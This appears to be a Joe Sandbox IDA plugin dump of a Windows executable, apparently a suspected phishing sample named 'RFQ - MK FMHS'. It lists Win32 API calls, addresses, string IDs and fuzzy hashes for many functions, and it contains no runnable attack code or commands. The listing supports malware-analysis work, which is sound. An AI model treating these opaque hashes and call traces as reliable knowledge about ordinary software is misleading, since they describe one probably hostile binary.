                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED2BEF
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C03
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C24
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
                    • Instruction ID: 08b69baa2396e07741d32cf4a09340a522ada879f22b4e8964d80a93d26ed903
                    • Opcode Fuzzy Hash: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
                    • Instruction Fuzzy Hash: DE618EB0900249AFDB21CF64CC88DBEBBB9EB61308F14555EEA51B7351D771AD06DB20
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EF7214
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EF7217
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EF723B
                    • _memset.LIBCMT ref: 00EF724C
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF725E
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EF72D6
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
                    • Instruction ID: 98d2ef841e450110b2fc715511af47fbbb1c2e731810ceb59222ad198ce76166
                    • Opcode Fuzzy Hash: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
                    • Instruction Fuzzy Hash: 03615971A00208AFDB20DFA4CC81EEE77F9AF09714F144199FA54E72A1D770AD45DB60
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EC7135
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00EC718E
                    • VariantInit.OLEAUT32(?), ref: 00EC71A0
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EC71C0
                    • VariantCopy.OLEAUT32(?,?), ref: 00EC7213
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EC7227
                    • VariantClear.OLEAUT32(?), ref: 00EC723C
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00EC7249
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC7252
                    • VariantClear.OLEAUT32(?), ref: 00EC7264
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC726F
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
                    • Instruction ID: c98c9f589dab989b422a99f54e17eb75f4ac2f2052a18c5727b5b8758731852d
                    • Opcode Fuzzy Hash: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
                    • Instruction Fuzzy Hash: 9E416D71A00219AFCB04DF65D948EAEBBB8FF48354F008069F955B7261CB31A94ACF90
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 00EE5AA6
                    • inet_addr.WSOCK32(?), ref: 00EE5AEB
                    • gethostbyname.WSOCK32(?), ref: 00EE5AF7
                    • IcmpCreateFile.IPHLPAPI ref: 00EE5B05
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B75
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B8B
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EE5C00
                    • WSACleanup.WSOCK32 ref: 00EE5C06
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: a90e7a9419854c3722cc9336c05e50929dc3b2cfb36385d3bfdae5d845f8f908
                    • Instruction ID: d093cf8b52408801ad521f7587c772b300c696cee71e3a46fc153f46735fe7ff
                    • Opcode Fuzzy Hash: a90e7a9419854c3722cc9336c05e50929dc3b2cfb36385d3bfdae5d845f8f908
                    • Instruction Fuzzy Hash: 4C51B1326047009FDB10AF26CC45B2AB7E0EF84318F14992AF559FB2A1DB70E800CF52
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDB73B
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EDB7B1
                    • GetLastError.KERNEL32 ref: 00EDB7BB
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00EDB828
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
                    • Instruction ID: acfeacb450a53fa58db09abd8a2348503575e4a8a660c4a825a220fd267e1f05
                    • Opcode Fuzzy Hash: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
                    • Instruction Fuzzy Hash: 59319C35A00209DFDB00EF64D885AFE7BB8EF84704F11912BE506F7392EB719942DA51
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EC94F6
                    • GetDlgCtrlID.USER32 ref: 00EC9501
                    • GetParent.USER32 ref: 00EC951D
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9520
                    • GetDlgCtrlID.USER32(?), ref: 00EC9529
                    • GetParent.USER32(?), ref: 00EC9545
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9548
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
                    • Instruction ID: 46be8086737b162e3a3614e4eb83d5f89ebd326d12756a759ad28b97895518bc
                    • Opcode Fuzzy Hash: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
                    • Instruction Fuzzy Hash: 6421B270A00104AFCF05AB65CCC5EFEBBA4EF85300F105129F561A72A2DB75991ADA60
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EC95DF
                    • GetDlgCtrlID.USER32 ref: 00EC95EA
                    • GetParent.USER32 ref: 00EC9606
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9609
                    • GetDlgCtrlID.USER32(?), ref: 00EC9612
                    • GetParent.USER32(?), ref: 00EC962E
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9631
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
                    • Instruction ID: 2a926d6013b9ea8e94e4d4cb71cc429a5762e23173e13ec5c8f8468229b54f8b
                    • Opcode Fuzzy Hash: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
                    • Instruction Fuzzy Hash: 7121D675A00104BFDF04AB61CDC5EFEBBB4EF44300F105019F551A72E2DB75951ADA60
                    APIs
                    • GetParent.USER32 ref: 00EC9651
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00EC9666
                    • _wcscmp.LIBCMT ref: 00EC9678
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EC96F3
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
                    • Instruction ID: ed76bc4ce7699344e0a07c639da930d4d9ba254edf61bc13e19365dc2209bc3a
                    • Opcode Fuzzy Hash: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
                    • Instruction Fuzzy Hash: A911CA76248317BAFA012631ED1FEE6B7DC9F05764F20102AF900B50E2FE9399529559
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00EE8BEC
                    • CoInitialize.OLE32(00000000), ref: 00EE8C19
                    • CoUninitialize.OLE32 ref: 00EE8C23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00EE8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EE8E50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F02C0C), ref: 00EE8E84
                    • CoGetObject.OLE32(?,00000000,00F02C0C,?), ref: 00EE8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 00EE8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EE8F3A
                    • VariantClear.OLEAUT32(?), ref: 00EE8F4A
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID:
                    • API String ID: 2395222682-0
                    • Opcode ID: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
                    • Instruction ID: d551765b782ee46ce7527f75a940ebfe4d2330a7cfe2accc1c69e562aefd4ec7
                    • Opcode Fuzzy Hash: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
                    • Instruction Fuzzy Hash: 03C15371208349AFC704EF65C98492BB7E9FF88348F00592DF58AAB261DB71ED05CB52
                    APIs
                    • __swprintf.LIBCMT ref: 00ED419D
                    • __swprintf.LIBCMT ref: 00ED41AA
                      • Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931
                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00ED41D4
                    • LoadResource.KERNEL32(?,00000000), ref: 00ED41E0
                    • LockResource.KERNEL32(00000000), ref: 00ED41ED
                    • FindResourceW.KERNEL32(?,?,00000003), ref: 00ED420D
                    • LoadResource.KERNEL32(?,00000000), ref: 00ED421F
                    • SizeofResource.KERNEL32(?,00000000), ref: 00ED422E
                    • LockResource.KERNEL32(?), ref: 00ED423A
                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00ED429B
                    Similarity
                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                    • String ID:
                    • API String ID: 1433390588-0
                    • Opcode ID: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
                    • Instruction ID: fc764626f86826e1fda586467d89c7ef3a065758cae950f73a5392fb9b5e941a
                    • Opcode Fuzzy Hash: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
                    • Instruction Fuzzy Hash: 9531B0B160121AAFDB119FA1DC84EBF7BADEF14301F044526F801F62A0E730DA52DBA0
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00ED1700
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1714
                    • GetWindowThreadProcessId.USER32(00000000), ref: 00ED171B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED172A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ED173C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1755
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1767
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17AC
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17C1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17CC
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
                    • Instruction ID: c9ac544d49a89fc236690425e7e3aaed0fe23f31c3f6af17bdca9a0d8e61c81f
                    • Opcode Fuzzy Hash: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
                    • Instruction Fuzzy Hash: 92319FB5600308BFDB21AF25DC84B7977AAEB56725F114097F800EA3A0DB71AD85DB90
                    APIs
                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E7FC06
                    • OleUninitialize.OLE32(?,00000000), ref: 00E7FCA5
                    • UnregisterHotKey.USER32(?), ref: 00E7FDFC
                    • DestroyWindow.USER32(?), ref: 00EB4A00
                    • FreeLibrary.KERNEL32(?), ref: 00EB4A65
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EB4A92
                    Similarity
                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                    • String ID: close all
                    • API String ID: 469580280-3243417748
                    • Opcode ID: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
                    • Instruction ID: 8a661d61db741646e810f949562c9a8c13416fe492d3093c30657becf9dce33c
                    • Opcode Fuzzy Hash: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
                    • Instruction Fuzzy Hash: 4AA15171701212CFCB29EF14C595A6AF7A4EF04704F54A2ADE90EBB292DB30AD16CF54
                    APIs
                    • EnumChildWindows.USER32(?,00ECAA64), ref: 00ECA9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
                    • Instruction ID: e924c0e6d2b7ede0300d30b22e58376a407680092d1b2facd0585765e7cc6286
                    • Opcode Fuzzy Hash: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
                    • Instruction Fuzzy Hash: A491C63090020A9BDF08DF60D582FE9FBB4BF44308F54A12DE88AB7151DF31699ADB91
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00E72EAE
                      • Part of subcall function 00E71DB3: GetClientRect.USER32(?,?), ref: 00E71DDC
                      • Part of subcall function 00E71DB3: GetWindowRect.USER32(?,?), ref: 00E71E1D
                      • Part of subcall function 00E71DB3: ScreenToClient.USER32(?,?), ref: 00E71E45
                    • GetDC.USER32 ref: 00EACF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EACF95
                    • SelectObject.GDI32(00000000,00000000), ref: 00EACFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 00EACFB8
                    • ReleaseDC.USER32(?,00000000), ref: 00EACFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EAD04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
                    • Instruction ID: 9cf75e779a09f8e8eeef9cb9278aa6bc52124556d2040424ad7d526b21ecba72
                    • Opcode Fuzzy Hash: 09488a041c08ddcaa5240c03ae2eb591abf45572cb0b500eca8b30f6024a0582
                    • Instruction Fuzzy Hash: 2771A334504209DFCF218F64CC84AFA7BB6FF4E364F24926AEE55BA265C7319841DB60
                    APIs
                      • Part of subcall function 00E72612: GetWindowLongW.USER32(?,000000EB), ref: 00E72623
                      • Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
                      • Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00EFC2E4
                    • ImageList_EndDrag.COMCTL32 ref: 00EFC2EA
                    • ReleaseCapture.USER32 ref: 00EFC2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 00EFC39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00EFC3AD
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00EFC48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 1924731296-2107944366
                    • Opcode ID: d3308c86a8c5057ff57e4253fc7bbdaa34a1a4529fd558c8442eecef3301afb9
                    • Instruction ID: cc68926f0dce6d5fe7bcc6b3b0c27cd49bceea9356e0c7cdd35596fd6aba611d
                    • Opcode Fuzzy Hash: d3308c86a8c5057ff57e4253fc7bbdaa34a1a4529fd558c8442eecef3301afb9
                    • Instruction Fuzzy Hash: E351AE70204308AFD714EF20C955F7A7BE5EF88314F10852DF695AB2E2CB71A948DB52
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00EFF910), ref: 00EE903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00EFF910), ref: 00EE9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EE91EB
                    • SysFreeString.OLEAUT32(?), ref: 00EE9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
                    • Instruction ID: 480cfd1caaaa30bd5fc30ea6611c09b72bff4c2df1599619fa81bd73bde1789d
                    • Opcode Fuzzy Hash: 7d72b49ac797f2f9eef6439658562c92d120e2bf1e50098ad34845d28a95eff2
                    • Instruction Fuzzy Hash: DBF11771A00209EFDB04DF95C888EAEB7B9FF89315F109059F915BB292DB31AE45CB50
                    APIs
                    • _memset.LIBCMT ref: 00EEF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EEFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EEFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EEFD90
                    • CloseHandle.KERNEL32(?), ref: 00EEFDBF
                    • CloseHandle.KERNEL32(?), ref: 00EEFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: d0213cedbbfd880d10dfa61fbe415de790623357c45bcf75cf31c1c2777c3c20
                    • Instruction ID: 4581e4662996ba89fb1981c623fb242b4dfe0af17dbbec16d9cf60ec8c0d80d6
                    • Opcode Fuzzy Hash: d0213cedbbfd880d10dfa61fbe415de790623357c45bcf75cf31c1c2777c3c20
                    • Instruction Fuzzy Hash: B3E1D331204385DFCB14EF25C881B6ABBE1AF84354F14956DF899AB3A2DB31EC45CB52
                    APIs
                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ED38D3,?), ref: 00ED48C7
                      • Part of subcall function 00ED48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ED38D3,?), ref: 00ED48E0
                      • Part of subcall function 00ED4CD3: GetFileAttributesW.KERNEL32(?,00ED3947), ref: 00ED4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 00ED4FE2
                    • _wcscmp.LIBCMT ref: 00ED4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 00ED5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
                    • Instruction ID: 5e53962c27c090f80e207ed1c8c4215240bb3865bdce0cbdc8a23d0845172f8c
                    • Opcode Fuzzy Hash: d8ca6fc35e73e466aa91394828f1aa87c2252e9b217fd51fe42bb29727457af6
                    • Instruction Fuzzy Hash: 9E5176B25087859BC724EB60C8819DFB3DCEF84340F10592FF289E3191EF75A5898766
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EF896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
                    • Instruction ID: 7162fd67fc240092cd8aa32f3b64522c13c83cb1a62d0cbfd2cf3c0a1d8e4275
                    • Opcode Fuzzy Hash: 211efd3f82ddf4d083046f8f794a7f39e49a4616ea4c0b070024068cbdb101ea
                    • Instruction Fuzzy Hash: 9851AF30A0064CBFDF249F248E85BB97BA5EF04364FA06116F715F61A1DF71A990DB81
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EAC547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EAC569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EAC581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EAC59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EAC5C0
                    • DestroyIcon.USER32(00000000), ref: 00EAC5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EAC5EC
                    • DestroyIcon.USER32(?), ref: 00EAC5FB
                      • Part of subcall function 00EFA71E: DeleteObject.GDI32(00000000), ref: 00EFA757
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
                    • Instruction ID: 80cae0771693bc66061e210061972b9531a5eef069793ffe90b8bd77abc3698b
                    • Opcode Fuzzy Hash: 2d73f668cf6ace962b0243676f1f69eec2b92092b4a8103d25736fed549ec67e
                    • Instruction Fuzzy Hash: A9516970A00209AFDB20DF25CC45BAA77E5EF59314F10952DFA06EB2A0DB70ED90DB50
                    APIs
                      • Part of subcall function 00ECAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECAE77
                      • Part of subcall function 00ECAE57: GetCurrentThreadId.KERNEL32 ref: 00ECAE7E
